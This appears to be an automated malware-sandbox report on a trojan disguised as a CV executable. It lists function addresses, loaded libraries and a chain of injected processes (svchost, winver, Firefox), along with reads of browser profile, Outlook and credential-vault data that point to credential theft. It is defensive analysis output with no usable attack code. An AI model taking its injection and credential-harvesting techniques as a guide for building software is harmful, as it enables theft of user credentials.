                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FD68B86_2_04FD68B8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050069626_2_05006962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050BA9A66_2_050BA9A6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF28406_2_04FF2840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FFA8406_2_04FFA840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF29A06_2_04FF29A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0501E8F06_2_0501E8F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AAB406_2_050AAB40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FEEA806_2_04FEEA80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A6BD76_2_050A6BD7
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A75716_2_050A7571
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE14606_2_04FE1460
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0508D5B06_2_0508D5B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050B95C36_2_050B95C3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AF43F6_2_050AF43F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AF7B06_2_050AF7B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050356306_2_05035630
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A16CC6_2_050A16CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF70C06_2_04FF70C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050BB16B6_2_050BB16B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0502516C6_2_0502516C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FFB1B06_2_04FFB1B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FDF1726_2_04FDF172
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0509F0CC6_2_0509F0CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A70E96_2_050A70E9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AF0E06_2_050AF0E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A132D6_2_050A132D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF52A06_2_04FF52A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0503739A6_2_0503739A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FDD34C6_2_04FDD34C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500B2C06_2_0500B2C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050912ED6_2_050912ED
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500D2F06_2_0500D2F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A1D5A6_2_050A1D5A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A7D736_2_050A7D73
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500FDC06_2_0500FDC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05069C326_2_05069C32
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF3D406_2_04FF3D40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AFCF26_2_050AFCF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AFF096_2_050AFF09
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF9EB06_2_04FF9EB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AFFB16_2_050AFFB1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF1F926_2_04FF1F92
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050859106_2_05085910
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF38E06_2_04FF38E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500B9506_2_0500B950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0505D8006_2_0505D800
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF99506_2_04FF9950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AFB766_2_050AFB76
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500FB806_2_0500FB80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05065BF06_2_05065BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0502DBF96_2_0502DBF9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AFA496_2_050AFA49
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A7A466_2_050A7A46
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05063A6C6_2_05063A6C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05035AA06_2_05035AA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0508DAAC6_2_0508DAAC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05091AA36_2_05091AA3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0509DAC66_2_0509DAC6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03011E306_2_03011E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300AF106_2_0300AF10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300CF306_2_0300CF30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300CD076_2_0300CD07
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300CD106_2_0300CD10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_030013716_2_03001371
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300B0556_2_0300B055
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300B0606_2_0300B060
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300B0A96_2_0300B0A9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301370B6_2_0301370B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_030137106_2_03013710
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_030155006_2_03015500
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0302BBF06_2_0302BBF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04DEE69D6_2_04DEE69D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04DED7686_2_04DED768
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04DEE1E46_2_04DEE1E4
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04DEE3036_2_04DEE303
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04DECA436_2_04DECA43
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0505EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04FDB970 appears 262 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 05037E54 appears 107 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 05025130 appears 58 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0506F290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 0039EC2F appears 68 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 003AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 003A6AC0 appears 42 times
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1699591068.0000000004233000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700637878.00000000043DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@19/12
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CCE7A GetLastError,FormatMessageW,0_2_003CCE7A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BAB84 AdjustTokenPrivileges,CloseHandle,0_2_003BAB84
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003BB134
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003CE1FD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_003C6532
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_003DC18C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0038406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0038406B
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeFile created: C:\Users\user\AppData\Local\Temp\autE216.tmpJump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 00000006.00000003.2222067639.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2222314858.00000000032E6000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4144237864.00000000032E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 71%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic file information: File size 1207808 > 1048576
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DIRZUznVUfWlad.exe, 00000005.00000000.1954793647.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144891699.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039E01E LoadLibraryA,GetProcAddress,0_2_0039E01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AC09E push esi; ret 0_2_003AC0A0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AC187 push edi; ret 0_2_003AC189
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EC8BC push esi; ret 0_2_003EC8BE
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039288B push 66003923h; retn 003Fh0_2_003928E1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A6B05 push ecx; ret 0_2_003A6B18
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CB2B1 push FFFFFF8Bh; iretd 0_2_003CB2B3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003ABDAA push edi; ret 0_2_003ABDAC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003ABEC3 push esi; ret 0_2_003ABEC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019F93C2 push ss; retf 0_2_019F9409
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019F940A push edi; retf 0_2_019F9601
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411948 push ss; retf 1_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040214C pushad ; retf 1_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AAC push esp; retf 1_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413B33 pushfd ; ret 1_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004033E0 push eax; ret 1_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004144FC push edi; retf 1_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415D23 push 00000009h; retn 3081h1_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408695 push edx; retf 1_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004086AF push edx; retf 1_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx1_2_03A309B6
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5FA2D push es; ret 5_2_02C5FA40
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C53B22 push esp; retf 5_2_02C53B23
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5306E push eax; retf 5_2_02C5306F
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4E9BE push ss; retf 5_2_02C4E9C4
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5C690 push eax; iretd 5_2_02C5C691
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5C6B5 push esp; retf 5_2_02C5C6BE
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4570B push edx; retf 5_2_02C45724
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C45725 push edx; retf 5_2_02C45724
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE09AD push ecx; mov dword ptr [esp], ecx6_2_04FE09B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300E310 push esi; ret 6_2_0300E317
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C237 push eax; iretd 6_2_0301C238
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003E8111
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0039EB42
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003A123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
